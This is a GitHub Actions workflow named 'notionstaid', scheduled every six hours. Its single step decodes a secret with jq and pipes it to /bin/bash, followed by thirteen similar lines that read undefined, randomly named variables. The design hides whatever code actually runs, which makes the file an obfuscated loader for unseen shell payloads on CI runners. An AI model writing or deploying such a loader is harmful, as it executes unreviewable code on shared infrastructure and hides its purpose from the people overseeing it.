name: notionstaid

on:
  workflow_dispatch:
  schedule:
    - cron: '7 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: notionstaid
        env:
          x0: ${{ secrets.x0 }}
        run: |
          echo $x0 | jq -r .eqlu5 | /bin/bash
          echo $eym36081 | jq -r .ixsu70 | /bin/bash
          echo $szzbi2 | jq -r .zxiqz2600 | /bin/bash
          echo $lgfd4095 | jq -r .anbjs05142 | /bin/bash
          echo $sqew137 | jq -r .sh0 | /bin/bash
          echo $ghyd1 | jq -r .f8059 | /bin/bash
          echo $ofkuf612 | jq -r .i647 | /bin/bash
          echo $tn3990 | jq -r .ij7261 | /bin/bash
          echo $dqavl3230 | jq -r .a8805 | /bin/bash
          echo $dekbq8550 | jq -r .d183 | /bin/bash
          echo $le97 | jq -r .dakhu10617 | /bin/bash
          echo $kr2 | jq -r .c764 | /bin/bash
          echo $z183 | jq -r .y65687 | /bin/bash
          echo $ei6426 | jq -r .uhcc03 | /bin/bash

